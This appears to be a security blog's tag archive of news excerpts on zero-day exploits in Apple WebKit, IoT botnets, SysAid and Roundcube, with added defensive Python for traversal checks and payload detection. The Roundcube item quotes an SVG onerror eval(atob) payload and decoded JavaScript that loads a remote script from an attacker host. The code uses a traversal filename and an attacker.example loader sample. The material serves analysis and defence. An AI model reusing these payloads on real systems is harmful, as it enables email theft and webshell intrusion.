Tag Archive for: Exploits

Apple Security Update Fixes Zero-Day Webkit Exploits


Apple recommends users update to iOS 17.1.2, iPadOS 17.1.2 and macOS 14.1.2. Google’s Threat Analysis Group discovered these security bugs.

Apple has patched two zero-day vulnerabilities affecting iOS, iPadOS and macOS; users are advised to update to iOS 17.1.2, iPadOS 17.1.2 and macOS 14.1.2. The vulnerabilities were discovered by Google’s Threat Analysis Group, which has also been working on fixes for actively exploited Chrome vulnerabilities this week.


What are these Apple OS vulnerabilities?

“Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1,” according to Apple’s post about the security updates on Nov. 30. This implies that attackers may be actively using the vulnerabilities.

Apple’s update said the problem originated in WebKit, the engine used for Apple’s browsers, where “processing web content may lead to arbitrary code execution.” The updates fix an out-of-bounds read through improved input validation and repair a memory corruption vulnerability using improved locking.


The first vulnerability, the out-of-bounds read, is tracked as CVE-2023-42916; the second, the memory corruption, as CVE-2023-42917. The updates addressing both are available for:

  • iPhone XS and later.
  • iPad Pro 12.9-inch 2nd generation and later.
  • iPad Pro 10.5-inch.
  • iPad Pro 11-inch 1st generation and later.
  • iPad Air 3rd generation and later.
  • iPad 6th generation and later.
  • iPad mini 5th generation and later.

Information is sparse about the vulnerabilities, which Apple said were investigated by Clément Lecigne at Google’s Threat Analysis Group; the group’s stated mission is to “counter government-backed attacks.”

Remediation and protection against the WebKit exploits

Apple users should be sure they are…

Source…

Novel Mirai-based DDoS botnet exploits 0-days to infect routers and security cameras


Threat actors are exploiting previously unknown bugs in certain routers and network video recorder (NVR) devices to build a Mirai-based distributed denial-of-service (DDoS) botnet, dubbed InfectedSlurs.

The newly discovered zero-day remote code execution vulnerabilities can be exploited if the device manufacturers’ default admin credentials have not been changed – a security measure users very often fail to take.

In a post this week, researchers at Akamai’s Security Intelligence Response Team (SIRT) said they discovered the botnet through their global honeypots last month and identified that it was targeting network video recorder (NVR) devices from a specific manufacturer.

“The SIRT did a quick check for CVEs known to impact this vendor’s NVR devices and was surprised to find that we were looking at a new zero-day exploit being actively leveraged in the wild,” the researchers wrote.

Further investigation revealed a second device from a different manufacturer – a wireless LAN router designed for hotels and residential use – was also being targeted by the threat actors behind the botnet.

The researchers said they alerted the manufacturers to the respective vulnerabilities and were told by both that they expected to release patches for the affected devices next month. Until that occurred, Akamai would not identify the manufacturers.

“There is a thin line between responsible disclosing information to help defenders, and oversharing information that can enable further abuse by hordes of threat actors,” the researchers said.

The targeted router is made by a Japanese vendor that produces multiple switches and routers. Japan’s Computer Emergency Response Team (JPCERT) had confirmed the exploit, but Akamai did not know whether more than one model in the company’s catalog was affected.

“The feature being exploited is a very common one, and it’s possible there is code reuse across product line offerings,” the researchers said.

Akamai labelled the botnet “InfectedSlurs” after the researchers discovered racial epithets and offensive language within the naming conventions used for the command-and-control domains associated with…

Source…

Lace Tempest Exploits SysAid Zero-Day Flaw


SysAid, an IT management software provider, has disclosed a critical security threat affecting its on-premises software. The threat actor, tracked by Microsoft as DEV-0950 or Lace Tempest and previously linked to the Clop ransomware group, is exploiting a zero-day vulnerability tracked as CVE-2023-47246. Left unaddressed, the vulnerability gives an attacker unauthorized access to and control over the affected server, posing a substantial risk to organizations. In this blog post, we’ll uncover the SysAid zero-day flaw and shed light on possible mitigation measures.


The Emergence of Lace Tempest Cyber Threat


SysAid, in a blog post, disclosed the active exploitation of a path traversal zero-day vulnerability by Lace Tempest. This revelation follows Microsoft’s early detection of the exploitation, prompting immediate action from SysAid. The gravity of the Lace Tempest cybersecurity threat is underlined by the group’s record: it had earlier orchestrated widespread attacks on users of the MOVEit Transfer product, affecting numerous organizations, including U.S. government agencies.


Cybersecurity News Lace Tempest


On November 2, Microsoft detected the exploitation of the SysAid vulnerability and promptly reported it to SysAid. The threat actor, Lace Tempest, was swiftly identified as the orchestrator behind the malicious activity. The association with Clop ransomware raised concerns, considering Lace Tempest’s involvement in previous attacks that involved data theft and ransom threats.


SysAid Zero-Day Flaw Mechanism


SysAid shed light on the intricacies of the zero-day exploit in SysAid orchestrated by Lace Tempest. The threat actor employed PowerShell to obfuscate their actions, making it challenging for incident response teams to investigate effectively. The modus operandi involved using the path traversal flaw to upload a WAR archive containing a WebShell into the webroot of the SysAid Tomcat web service. Tomcat deploys WAR archives placed in its webroot, so the WebShell became reachable over HTTP, which in turn granted unauthorized access to and control over the compromised system.
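The following Python is an added illustration of that chain, not code from SysAid’s advisory or from the attackers’ tooling. It contrasts a naive upload handler, whose path join lets a traversal filename resolve into Tomcat’s webapps directory, with a hardened handler that rejects anything but a single path component, and adds a small hunt over a directory listing for WAR archives that are not on an allowlist. The install paths, the allowlist and the listing are constructed assumptions.

```python
import posixpath

# Constructed layout for the example; the page gives no SysAid install paths.
UPLOAD_DIR = "/opt/sysaid/data/uploads"
TOMCAT_WEBAPPS = "/opt/sysaid/tomcat/webapps"
KNOWN_WEBAPPS = {"SysAidServer.war"}          # hypothetical allowlist for the hunt


def vulnerable_upload_path(user_filename: str) -> str:
    """Naive join: the client-chosen name is trusted, so '..' segments walk out of UPLOAD_DIR."""
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, user_filename))


def safe_upload_path(user_filename: str) -> str:
    """Accept only a single path component and confirm the result stays inside UPLOAD_DIR."""
    if not user_filename or "\x00" in user_filename:
        raise ValueError("empty or NUL-containing filename")
    if "/" in user_filename or "\\" in user_filename or user_filename in (".", ".."):
        raise ValueError("path separators and traversal segments are not allowed")
    candidate = posixpath.normpath(posixpath.join(UPLOAD_DIR, user_filename))
    if posixpath.dirname(candidate) != UPLOAD_DIR:
        raise ValueError("resolved path escapes the upload directory")
    return candidate


def lands_in_webapps(path: str) -> bool:
    """True when a resolved path is inside Tomcat's auto-deploy directory."""
    return path.startswith(TOMCAT_WEBAPPS + "/")


def hunt_unexpected_wars(listing, known=frozenset(KNOWN_WEBAPPS)):
    """WAR archives under webapps/ whose name is not on the allowlist.

    `listing` is any iterable of absolute paths (os.walk output, a file-integrity
    report, an EDR file inventory). Tomcat unpacks a WAR into a directory of the
    same name, so that directory is worth collecting as well.
    """
    return [
        p for p in listing
        if lands_in_webapps(p) and p.lower().endswith(".war")
        and posixpath.basename(p) not in known
    ]


# Constructed sample input
TRAVERSAL_NAME = "../../tomcat/webapps/dropped.war"
SAMPLE_LISTING = [
    "/opt/sysaid/tomcat/webapps/SysAidServer.war",
    "/opt/sysaid/tomcat/webapps/dropped.war",
    "/opt/sysaid/tomcat/webapps/dropped/WEB-INF/web.xml",
    "/opt/sysaid/data/uploads/report.pdf",
]

if __name__ == "__main__":
    resolved = vulnerable_upload_path(TRAVERSAL_NAME)
    print("naive handler writes to:", resolved, "| in webapps:", lands_in_webapps(resolved))
    try:
        safe_upload_path(TRAVERSAL_NAME)
    except ValueError as err:
        print("hardened handler rejected it:", err)
    print("unexpected WARs:", hunt_unexpected_wars(SAMPLE_LISTING))
```

The point of the dirname check in safe_upload_path is that it does not depend on the separator filter being complete; whatever the input, the write only proceeds if the normalised path’s parent is exactly the upload directory.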


SysAid’s Urgent Advisory


The SysAid security update revealed the urgency to take immediate action by upgrading to the fixed version 23.3.36. The company emphasized the need for users to proactively search for indicators of compromise…

Source…

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail


After reading the technical details about this zero-day that targeted governmental entities and a think tank in Europe and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack exploited a zero-day vulnerability in Roundcube webmail, giving the attacker the ability to list folders and emails in Roundcube accounts and to exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.


Technical details about this cyberattack exploiting a 0day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A: Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, an SVG tag contains a base64-encoded malicious payload; it is hidden from the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg"> <image href="http://www.bing.com/news/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The image’s href points at a URL that does not serve a valid image (the trailing x), so the load fails and the onerror handler fires; that handler is where the attacker’s code runs.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher could establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to “… properly sanitize the malicious SVG…
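As an added example (not ESET’s analysis code and not Roundcube’s rcube_washtml.php), the following Python does the two things a defender would want for the payload shown above: it walks the HTML of a message, reports every on* attribute together with the decoded atob('…') payload and the stage-2 script URL inside it, and re-serialises the message with those handlers dropped, which is the behaviour the sanitiser failed to provide for the SVG. The sample message is constructed to the structure described above, and the loader URL in it is a placeholder, not the real Winter Vivern infrastructure.

```python
import base64
import html
import re
from html.parser import HTMLParser

# Constructed sample message modelled on the structure ESET describes; the
# loader URL is a placeholder, not the real Winter Vivern infrastructure.
STAGE2_JS = (
    "var fe=document.createElement('script');"
    'fe.src="https://attacker.example/controlserver/checkupdate.js";'
    "document.body.appendChild(fe);"
)
SAMPLE_HTML = (
    "<html><body><p>Get started in your Outlook</p>"
    '<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg">'
    '<image href="http://www.bing.com/news/x" onerror="eval(atob(\'{b64}\'))" />'
    "</svg></body></html>"
).format(b64=base64.b64encode(STAGE2_JS.encode()).decode())

ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
SRC_RE = re.compile(r"""\.src\s*=\s*['"]([^'"]+)['"]""")


class HandlerFinder(HTMLParser):
    """Collect (tag, attribute, value) for every on* attribute in the document."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):          # HTMLParser already lowercases names
                self.findings.append((tag, name, value or ""))

    handle_startendtag = handle_starttag       # <image ... /> arrives here


def find_event_handlers(doc):
    p = HandlerFinder()
    p.feed(doc)
    return p.findings


def decode_atob_payloads(js):
    """Decode every atob('...') literal in a handler; skips anything that is not valid base64."""
    decoded = []
    for b64 in ATOB_RE.findall(js):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:                      # binascii.Error is a ValueError
            continue
    return decoded


def loader_urls(doc):
    """Stage-2 script URLs referenced from inline handlers, for blocklists and IOC matching."""
    urls = []
    for _tag, _attr, value in find_event_handlers(doc):
        for js in decode_atob_payloads(value):
            urls.extend(SRC_RE.findall(js))
    return urls


class Washer(HTMLParser):
    """Re-serialise the document, dropping every on* attribute on every element."""

    def __init__(self):
        super().__init__()
        self.out = []

    def _open(self, tag, attrs, self_closing):
        kept = " ".join(
            f'{n}="{html.escape(v or "", quote=True)}"'
            for n, v in attrs if not n.startswith("on")
        )
        self.out.append(f"<{tag}{' ' + kept if kept else ''}{' /' if self_closing else ''}>")

    def handle_starttag(self, tag, attrs):
        self._open(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._open(tag, attrs, True)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data))      # data arrives unescaped; re-escape it


def strip_event_handlers(doc):
    w = Washer()
    w.feed(doc)
    w.close()
    return "".join(w.out)


if __name__ == "__main__":
    for tag, attr, value in find_event_handlers(SAMPLE_HTML):
        print(f"<{tag} {attr}=...>")
        for js in decode_atob_payloads(value):
            print("  decoded:", js)
    print("loader URLs:", loader_urls(SAMPLE_HTML))
    print("washed:", strip_event_handlers(SAMPLE_HTML))
```

The washer is deliberately element-agnostic: the lesson of this bug is that event handlers inside SVG are as dangerous as those on HTML elements, so the drop rule keys on the attribute name alone rather than on a list of known-bad tags.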

Source…